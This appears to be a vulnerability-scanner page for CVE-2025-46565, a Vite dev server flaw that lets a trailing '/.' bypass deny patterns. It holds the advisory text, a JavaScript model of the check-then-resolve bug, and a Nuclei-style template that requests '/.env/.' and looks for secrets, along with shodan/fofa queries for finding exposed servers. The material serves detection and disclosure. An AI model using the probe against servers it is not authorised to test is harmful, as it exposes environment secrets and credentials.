Vite Dev Server - Information Exposure
Description
Vite is a frontend tooling framework for JavaScript. Before versions 6.3.4, 6.2.7, 6.1.6, 5.4.19, and 4.5.14, the contents of files in the project root that are denied by a file matching pattern can be returned to the browser. Only apps that explicitly expose the Vite dev server to the network (using `--host` or the `server.host` config option) are affected, and only files that are under the project root and denied by a file matching pattern can be reached through the bypass. `server.fs.deny` can contain patterns that match against files (by default it includes `.env`, `.env.*`, and `*.{crt,pem}`). For files under `root`, these patterns could be bypassed by using a combination of slash and dot (`/.`). This issue has been patched in versions 6.3.4, 6.2.7, 6.1.6, 5.4.19, and 4.5.14.
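The following added example is a simplified model of this class of bug, not Vite's source code: it shows why a deny pattern matched against the raw request path misses a trailing `/.`, and why matching after the path is normalized does not. The regexes, function names, and the `/srv/app` root are assumptions made for illustration.

```javascript
// Added illustration: a simplified model, not Vite's source code.
// DENY approximates the default server.fs.deny entries (.env, .env.*, *.{crt,pem}).
const DENY = [/^\.env$/, /^\.env\..+$/, /\.(crt|pem)$/];

// Last path segment exactly as given, with no cleanup.
const lastSegment = (p) => p.split('/').pop();

const isDenied = (p) => DENY.some((re) => re.test(lastSegment(p)));

// Collapse empty, "." and ".." segments the way a path resolver would.
function normalize(urlPath) {
  const out = [];
  for (const seg of urlPath.split('/')) {
    if (seg === '' || seg === '.') continue;
    if (seg === '..') out.pop();
    else out.push(seg);
  }
  return '/' + out.join('/');
}

// Weak ordering: match the raw request path, then resolve it.
function checkThenResolve(root, urlPath) {
  if (isDenied(urlPath)) return { status: 403 };
  return { status: 200, file: root + normalize(urlPath) };
}

// Corrected ordering: resolve first, then match the path that will be read.
function resolveThenCheck(root, urlPath) {
  const resolved = normalize(urlPath);
  if (isDenied(resolved)) return { status: 403 };
  return { status: 200, file: root + resolved };
}

// Constructed sample requests against a hypothetical root.
const ROOT = '/srv/app';
for (const p of ['/.env', '/.env/.', '/certs/dev.pem/.', '/src/main.js']) {
  console.log(p, checkThenResolve(ROOT, p).status, resolveThenCheck(ROOT, p).status);
}
```

The first status column is the weak ordering and the second is the corrected one; the two differ only on the paths that end in `/.`.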
Severity
CVSS Score
5.3
Exploit Probability
1%
Published Date
Template Author
id: CVE-2025-46565

info:
  name: Vite Dev Server - Information Exposure
  author: ritikchaddha
  severity: medium
  description: |
    Vite is a frontend tooling framework for JavaScript. Before versions 6.3.4, 6.2.7, 6.1.6, 5.4.19, and 4.5.14, the contents of files in the project root that are denied by a file matching pattern can be returned to the browser. Only apps explicitly exposing the Vite dev server to the network (using --host or server.host config option) are affected. Only files that are under project root and are denied by a file matching pattern can be bypassed. `server.fs.deny` can contain patterns matching against files (by default it includes .env, .env.*, *.{crt,pem} as such patterns). These patterns were able to bypass for files under `root` by using a combination of slash and dot (/.). This issue has been patched in versions 6.3.4, 6.2.7, 6.1.6, 5.4.19, and 4.5.14.
  reference:
    - https://github.com/vitejs/vite/security/advisories/GHSA-859w-5945-r5v3
    - https://nvd.nist.gov/vuln/detail/CVE-2025-46565
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2025-46565
    epss-score: 0.01436
    epss-percentile: 0.80931
    cwe-id: CWE-22
  metadata:
    max-request: 2
    fofa-query: body="/@vite/client"
    shodan-query: http.html:"/@vite/client"
  tags: cve,cve2025,vite,exposure,bypass

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/.env"

    matchers:
      - type: status
        status:
          - 403
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/.env/."

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "VITE_APP_SECRET"
        case-insensitive: true

      - type: status
        status:
          - 200
# digest: 4a0a0047304502204f890e0c0756e1018ab77854f7c1675aa07faa9a6b4202afeb9a9aafc5f5c614022100f04272abce2abe60e57287133e10f722a4ccf1857536c4562471780a01020d50:922c64590222798bb761d5b6d8e72950